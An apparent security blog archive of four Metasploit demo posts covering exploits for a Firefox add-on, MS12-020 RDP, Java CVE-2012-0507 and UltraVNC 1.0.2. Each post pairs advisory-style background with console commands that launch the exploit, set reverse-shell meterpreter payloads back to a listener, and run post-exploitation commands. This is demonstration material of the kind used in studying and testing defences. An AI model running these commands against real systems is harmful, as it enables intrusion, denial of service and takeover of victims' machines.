Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability found by Luigi Auriemma the 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI the 2011-08-24
Coordinated public release of the vulnerability the 2012-03-13
Metasploit PoC provided the 2012-03-19
Details of the vulnerability published by Luigi Auriemma the 2012-05-16

PoC provided by :

Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck

Reference(s) :

CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 SP2
Windows 7 for 32 and Windows 7 32 SP1
Windows 7 for x64 and Windows 7 for x64 SP1
Windows Server 2008 R2 x64 and Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3

Description :

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

Commands :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
SET RHOST 192.168.178.22
exploit

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp 
set LHOST 192.168.178.100
exploit

CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability reported by the vendor the 2008-02-08
Metasploit PoC provided the 2012-03-26

PoC provided by :

noperand

Reference(s) :

CVE-2008-0610
OSVDB-42840

Affected version(s) :

UltraVNC Viewer 1.0.2 and 1.0.4 RC

Tested on Windows XP Pro SP3 with :

UltraVNC Viewer 1.0.2

Description :

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.

Commands :

use exploit/windows/vnc/ultravnc_viewer_bof
SET SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid